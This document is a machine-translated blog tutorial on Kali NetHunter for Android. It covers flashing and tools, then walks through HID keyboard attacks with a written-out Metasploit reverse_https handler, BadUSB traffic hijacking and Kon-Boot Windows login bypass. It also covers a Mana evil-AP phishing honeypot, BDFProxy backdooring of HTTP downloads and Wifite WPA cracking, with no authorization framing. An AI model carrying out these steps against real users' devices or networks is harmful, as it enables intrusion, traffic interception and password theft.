Pocket Hacking: NetHunter hands-on Guide

Pocket Hacking: NetHunter hands-on Guide
0x00 Preface

Many of my friends hope that the Hacking kit can be easily transplanted from a PC to a more portable mobile phone or tablet, while the Kali NetHunter released by the Offensive Security team has turned this expectation into reality, hacking through mobile terminals anytime, anywhere.

Kali NetHunter is a portable penetration testing platform based on native Android, which uses Nexus (mobile phone/tablet) as the basic hardware device (new support for 1 + mobile phones. familiar Kali makes it easy to use, while graphical control interface makes some tests easier. based on this platform, engineers can also freely participate in personal projects.

There are relatively few articles about NetHunter at home and abroad and there is a high degree of repetition. So I will sort out the main practical skills here for your reference. due to insufficient information, errors are inevitable. If any omission or error occurs, please kindly advise.

 

0x01 hardware support

The NetHunter official website provides the following mobile phones that can be flushed into NetHunter:

Nexus 4 (GSM) - “mako”Nexus 5 (GSM/LTE) - “hammerhead”Nexus 7 [2012] (Wi-Fi) - “nakasi”Nexus 7 [2012] (Mobile) - “nakasig”Nexus 7 [2013] (Wi-Fi) - “razor”Nexus 7 [2013] (Mobile) - “razorg”Nexus 10 (Tablet) - “mantaray”OnePlus One 16 GB - “bacon”OnePlus One 64 GB - “bacon”

It is worth mentioning that, in 2015, NetHunter updated, because of the low cost and high performance of 1 + mobile phones, it was added to the Support List. Thanks to friends who use 1 + mobile phones, the following flash machine uses Nexus5 as an example.

0x02 flashing process

 

Open the installer and install it in the default path.

After installation, run the NetHunter Installer and update it. Go to the Pilot installation step.

Step 1: select an existing hardware device model.

Step 2: Install the driver

You can Test whether the installation is successful through Test Drivers.

Step 3. Installation Options

If you have downloaded the refresh history from the official website, select a file through Browser. Check the SHA1 value after the download. As for Android Flash Setting, it is not available because the support for Android L has not been completed.

Step 4: download an object

Download all dependent files.

All the dependent packages are Ready.

Step 5: Unlock the device

Unlock bootloader. Note that USB debugging is allowed, and the mobile phone will restart and unlock.

Step 6: reset the original Android

You can also select allow USB debugging on your phone. Note that the data will be cleared. Remember to back up the data.

Step 7: Click NetHunter.

After resetting the phone number in the previous step, you need to re-enable the developer mode. In this case, you can click the Kali Linux image and perform Root operation on the phone. This takes a relatively long time. (Note: If the image cannot be pushed successfully, you can manually copy kali_linux_nethunter_1.10_hammerhead_kitkat.zip to the/sdcard/download/directory to INSTALL it)

Final, installed successfully

0x03 list of recommended apps

After the system is flushed in, you need to enrich the original NetHunter tools. You can download some Android apps for your convenience.

Chinese Input Method: it is essential to be a Chinese dog.

File Manager (such as RootExplorer): some files in Kali need to use the File Manager that supports Root permissions.

ShadowSocks: the ladder is still required

MiTM tool:

ZANTI2: although some functions are restricted for commercialization, the user experience is indeed better. dSploit: Once well-known lanmitm: The Intercepter-NG: sniffing tool Network Spoofer compiled and released by security workers in China. It comes with many playing functions.

IPTools: a collection of some common basic network tools

ChangeHostname: Modify the Host Name of the current mobile phone (or necessary ).

Wightle wifi: War Driving tool, which collects Wireless Hotspot information and can be saved to the local database.

SQLiteEditor: easy to read database information

Hacker's KeyBoard: comes with NetHunter to facilitate various control characters

Remote Desktop: comes with NetHunter to facilitate connection to the VNC service.

DriveDroid: comes with NetHunter. The image in the mobile phone is simulated as the boot disk.

0x04 directory and service

After installing NetHunter, first study its directory and service. The root directory of Kali NetHunter corresponds to the/data/local/kali-armhf directory of the Android system directory.

NetHunter's built-in tools are also in this directory. therefore, if you cannot find the storage address for files such as packet capture/logs, you may wish to find it in this directory (Note: Root permission is required ). in addition, the prompt directory for some NetHunter tools during runtime is also used as the root directory.

Normally, intercepted data packets and other files are stored in the Captures directory under the NetHunter directory:

Similar to Kali Linux, most tools are stored in/usr/share and links are established. The command line can be called directly.

However, Metasploit is still in the/opt/directory.

The/opt/dic directory contains dictionary files.

This is the/var/www directory. I want you to know how to use it :)

As for services, the Offensive Security team added NetHunter Home in the new version to manage Service switches in the form of apps, this avoids the disadvantages of WebServer Management in earlier versions (for example, Google Fonts called by Web pages is blocked by the wall for half a day ;)

Display, NetHunter Home is the main page, in addition to the Offensive Security Banner, you can also get the current IP address (Intranet/Internet.

Kali Launcher integrates four starters:

Terminal open a Kali Shell terminal open Kali NetHunter Menu terminal open Wifite enter wireless cracking update Kali NetHunter (execute sudo-c bootkali update)

Set the NetHunter Service Switch Control in the Kali Service Control Panel.

As you can see, NetHunter can open services such as SSH, Dnsmasq, Hostapd, OpenVPN, Apache, Metasploit, and BeEF FrameWork.

SSH service: Secure Shell, which facilitates Connection Control of other devices. dnsmasq service: DNS resolution service. hostapd service: Provides Wireless Access Point services. openVPN service: Open OpenVPN Connection Service. apache service: WEB service. metasploit service: provides protection for the MSF Attack Module. beEF FrameWork Service: XSS uses the FrameWork service.

On this panel, you can switch the corresponding service.

0x05 Kali NetHunter Menu

In NetHunter Launcher, the startup items of Kali Menu include commonly used NetHunter tools ,:

Compared with the previous version, the following options are added:

USB AttacksNFC AttacksMonitor ModeEject USB Wifi

The main modules and descriptions are as follows:

Wireless Attacks

Wifite

Automatic wireless security audit tool

Kismet

Wireless WarDriving Tool

Ap f ** ker

Wireless Network malicious attack tools (mostly Denial-of-Service)

Wash

Scan wireless networks with WPS Enabled

Airodump-ng

Basic wireless attack Suite (required)

Pingen

Calculate the PIN code of some D-link routers with WPS enabled to crack

Sniffing/Spoofing

Tcpdump

Basic traffic Dump Tool

Tshark

WireShark Cli tool to capture and analyze traffic

Urlsnali

Part of the Dsniff toolkit, which can sniff HTTP request packet content and output it in CLF common log format

Dsniff

Powerful well-known password sniffing Tool Kit

MITMproxy

The intermediate proxy can intercept and modify HTTP traffic. For details, refer to the official website.

Reverse Shells

AutoSSH

Reverse shell through SSH (NAT Bypass)

PTunnel

Transmit data through ICMP packet Tunnel

Info Gathering

Spiderfoot

Open-source scanning and information collection tools collect subdomains, Email addresses, web Server versions, and other information for a given domain name, and perform automated scanning.

Recon-ng

Powerful information collection tools, modular, but many plug-ins are not applicable in China (with walls ).

Device-pharmer

Search by Shodan, big data Hacking.

Vulnerability Scan

OpenVas

The vulnerability scanner requires additional installation. Kali is always included by default, so it is difficult for the customer to decide on its own .:)

Exploit Tools

Metasploit

Powerful, core, essential

BeEF-XSS

XSS penetration testing tool, depending on your habits

Social-Engineering-Toolkit

SET under Kali, social engineering kit, powerful functions.

MITMf

Man-in-the-middle attack framework, based on Python, with multiple plug-ins, powerful penetration testing

OpenVPN Setup

OpenVPN settings

VNC Setup

VNC settings

Log/Capture Menu

All local data captured or synchronized to the SD card can be erased (synchronization mainly solves the permission problem. For example, if most Android apps do not have the root permission, they cannot read the data intercepted by the NetHunter tool)

USB Attacks

Dictionary based brute force attack

Automatically input a dictionary line and press enter to simulate brute-force cracking Based on HID.

DeADBolt

Execute a bunch of ADB commands to push private files and other information to the specified directory, see the project home page https://github.com/photonicgeek/deADBolt

NFC Attack

The function of copying, rewriting, and viewing M card data is provided (Do you not need to bring Acr122u ;)

Settings

Change the time zone to Metasploit. Create users and databases. Modify the MAC address and install NodeJS.

Service

SSH service switch VNC service switch OpenVPN Service Switch start Xserver locally

Monitor Mode

Enable or disable the hybrid listening mode of wlan1 (external wireless network card)

Eject USB Wifi

Pop-up USB wireless network card

0x06 HID KeyBoard Attack

In the past, USB self-start often relied on autorun in the inserted USB device. inf implementation. nowadays, this is often ineffective, and the emerging usb hid Attack becomes a new security threat. you can use a keyboard or mouse to execute the target code in real time. Here, we use PowerSploit and MSF as an example:

First, run the webserver that provides payload, and enable the Apache server in Kali Service Control.

Go to the HID attack configuration page and select PowerSploit

Enter the IP address and port used for MSF listening. For Payload, select windows/meterpreter/reverse_https. The URL is the IP address that provides the Apache service. The local machine is 192.168.1.151.

After configuration, UPDATE the configuration file. Next, configure the MSF listener to rebound the shell.

root@kali:~# msfconsole -qmsf > use exploit/multi/handlermsf exploit(handler) >

Payload is the same as payload on the HID configuration page.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_httpsPAYLOAD => windows/meterpreter/reverse_https

Set the same IP address and port

msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.0.17LHOST => 192.168.0.17msf exploit(handler) > set LPORT 4444LPORT => 443msf exploit(handler) > exploit[*] Started HTTPS reverse handler on https://0.0.0.0:4444/[*] Starting the payload handler...

Now configure OK

Start listening

Connect the device to the PC. Wait until the device is identified and Execute the command to start the attack.

After running the POWERSHELL command, you can see the reverse shell in msf:

If no response is received after the connection to the PC, press the Reset USB key to update the response.

Of course, the HID KeyBoard Attack also provides the Windows CMD Attack Module, that is, after connecting to the computer, the CMD is automatically opened and the specified command is executed (by default, the new administrator user is added and can be customized ).

0x07 BadUSB MITM Attack

BadUSB Attack is an advanced USB Attack method announced at the BlackHat conference. Payload, such as analog keyboard operations, can automatically perform certain operations, netHunter's BadUSB MiTM Attack is one of the methods: modifying network settings and hijacking network traffic.

The following operations are taken as an example:

First, make sure that the MTP file transfer is disabled when the mobile phone is connected to the target computer. connect to the target computer and enable the USB network sharing of the mobile phone:

In this case, open a Kali Shell in NetHunter Home to check that the NIC has more virtual Nic rndis0 (USB network shared Nic ).

In this case, you can enable Tcpdump to intercept traffic. The command is as follows:

tcpdump -i rndis0

Return to NetHunter Home, switch to BadUSB MiTM Attack, and select Start BadUSB Attack in the upper right corner.

At this time, the connected computer will have an extra Nic, And the Gateway is an IP address of rndis0.

At this time, the traffic can be intercepted. For example, when accessing some websites, the traffic at tcpdump on the mobile phone is displayed as follows:

The PC cannot return to the page because the phone is not inserted with a SIM card and has no network.

Some people mentioned in a previous article about Kali Nethunter in Drops:

Because of the emergence of the dual gateway, the traffic is not directly directed to the malicious Gateway (10.0.0.1) as shown on the official website, but still goes through the previous Gateway (192.168.1.1), the hijacking fails.

This may also happen. However, in personal tests, the network connection priority is higher. By default, the priority of the Gateway after hijacking is higher, so the traffic can be hijacked normally. it may also be the optimization done by NetHunter after this year's update, as shown in:

Of course, it is also a good way to test the Attack with HID Keyboard Attack. As for data packet storage and analysis, you can do it yourself.

0x08 bypass Windows logon authentication

NetHunter actually has many hidden methods, such as using DriveDroid to achieve Windows login bypass password.

DriveDroid is an App that allows you to boot a PC using the ISO/IMG image file in your Android phone. However, it is feasible to bypass Windows login authentication by combining with a specific image :)

Take Windows 7 as an example. First, create the password hello for the default account.

DriveDroid stores the default directory of the pilot image in SDCard/Download/images. You only need to store the image to be guided in this directory.

Here, the image used to bypass Windows or OSX login authentication is Kon-Boot. you can go to the official website to learn about how to handle the boot processing of BIOS modification system kernel, skip the SAM check, and directly log on to the system. because it is a paid software, the following uses the image you are looking for as an example to demonstrate.

Disable MTP file transmission, open DriveDroid, and automatically list the image files under the images directory.

Select Kon-Boot.img image Mount, mode here select Read-Only USB

After the image is loaded successfully, the image is marked

In the connected pc, a new removable disk (or a soft drive disk) is also displayed. If the disk is not displayed, you can adjust the configuration on the configuration page (you can use the USB Setup Wizard guide)

At this time, restart the PC with a password and enter the BIOS settings startup Item.

If the image is loaded successfully, you can see the flying pattern as follows:

Then log on to the user's password and press enter to bypass Password Authentication and log on to the system.

You cannot directly modify or delete the system password when logging on to the system.

0x09 WarDriving

I still remember the stories of my predecessors as WarDriving. Since the development of smart devices, WarDriving has been replaced by portable devices. however, we have not found a more appropriate and intuitive WarDriving tool so far. We look forward to some friends who can develop or recommend it.

In NetHunter, Kismet in the Wireless module of Kali-Menu is used as the default tool of WarDriving. However, the picture is too beautiful:

Next, we recommend that you use App wigglewifi. However, do not upload data accidentally. Use easy, and the interface is ugly.

Fortunately, the data can be stored locally in the Sqlite database format.

0x10 Mana EvilAP Honeypot

Want to create a CMCC wireless network phishing hijacking traffic? PineApple is not around. Take out your cell phone and open a honeypot .:)

The Mana honeypot uses the same Karma patch as PineApple: Hostapd, which can be used to spoof wireless network users, so that they can be smoothly connected to a false AP for subsequent attacks.

It should be noted that most of the NetHunter wireless Attack Modules require the use of OTG external USB wireless NICs. mainstream chips (you can try to identify Kali directly. WN722N is recommended, while the mini EDUP Nic is more universal (Raspberry Pi can also be directly identified), only the signal strength .. naturally, you can imagine.

Mana honeypot has multiple Hacking modes, all of which are sh scripts and can be customized freely. The installation directory of Mana tool is:

/usr/share/mana-toolkit

The STARTUP script is stored here:

/usr/share/mana-toolkit/run-mana

Traffic interception files are stored in:

/var/lib/mana-toolkit

You can easily modify the configuration file on the Mana honeypot page of NetHunter Home:

Hostapd configuration file

DHCP service configuration file

DNS Spoofing configuration file

There are multiple service startup scripts, which can be freely edited and modified:

Corresponding to the script start-nat-full.sh, the script requires a USB wireless NIC (with upstream traffic) to start, wireless connection to NAT mode, and start all the scripts including: firelamb, sslstrip, sslsplit, etc, the traffic is intercepted and saved.

Start-nat-simple.sh also has upstream traffic, but does not start scripts such as firelamb, sslstrip, sslsplit.

Start-nat-simple-bdf.sh, added BDF malicious code Inject tool, the next chapter will introduce its attack ideas.

In addition

Start-noupstream.sh

Mana is started as a false AP that cannot access the Internet, but it can attract devices enabled by default by WIFI to automatically connect and capture information.

Start-noupstream-eap.sh

Mana cannot access the Internet, but it will launch EAP attacks.

After editing the Startup File, Start Attack will pop up and check the startup script:

To start the service.

0x11 Backdooring Executable Over HTTP

This attack idea is interesting. the new function was released in NetHunter's January 5 this year version as Kali Nethunter's latest and most cool gameplay, originated from the github project of secret squirrel the-backdoor-factory and BDFProxy, it allows us to easily inject shellcode into the binary file transmitted using the HTTP protocol.

First, create a Mana Honeypot. The SSID uses the default name internet to start the service.

cd /usr/share/mana-toolkit/run-mana./start-nat-simple-bdf.sh

Open another Shell and edit bdfproxy. cfg, which contains the default payload settings for different platforms. however, due to display issues, the text edited with nano will be refreshed in one row, but it is better to edit it in another way. here, only the IP address 192.168.1.151 can be modified. You can also configure it in MANA edevil Access Point under the main panel of Nethunter.

nano /etc/bdfproxy/bdfproxy.cfg

After configuring the IP address, enter bdfproxy in the Shell to run it.

Start Metasploit with another Shell.

Everything is ready. Wait for the PC connected to the honeypot AP to download the binary file online. download everything from Baidu here:

Run everthing. Because payload is injected, a message indicating a failed self-verification will appear.

Check MSF, and the system has successfully rebounded back to Shell. The above self-verification failure prompt is that the screenshot of MeterPreter helped me capture it :)

I have to say that this new feature is really Cool.

0x12 Wifite cracking

Finally, it is not mentioned that wireless cracking is unscientific.) The Wifite cracking tool recommended by NetHunter is one of its earliest integrated functions. the portability of mobile devices is more conducive to Wifi Security Testing anytime and anywhere. You only need to mount an external wireless network card to easily capture packets and crack it. however, we do not recommend that you directly crack the captured packets on a mobile device. If the attack fails for a few minutes, you can use a high-performance device to crack the attack. Otherwise, the device may crash.

After the external wireless network card is connected, select Launch Wifite in the Nethunter main menu to enter

Select the NIC that enables the hybrid listening mode and select Wlan1

Scanning starts and is updated every 5 seconds. When the attack target is confirmed, CTRL + C stops scanning.

Enter the attack target number, Here select the XDSEC-WIFI, enter 2

After successful packet capture, Dictionary cracking is automatically called. The dictionary is deleted and automatically exits.

The captured handshake package is stored in the/data/local/kali-armhf/HS directory. The naming rule is SSID + MAC.

If WPS is enabled for the target, the PIN code is automatically cracked.

Wifite is relatively foolish and easy to operate. It is suitable for mobile terminals. the wireless network password test pen has been successful several times. After connecting to the wireless network, it can be played with zANTI and other tools :)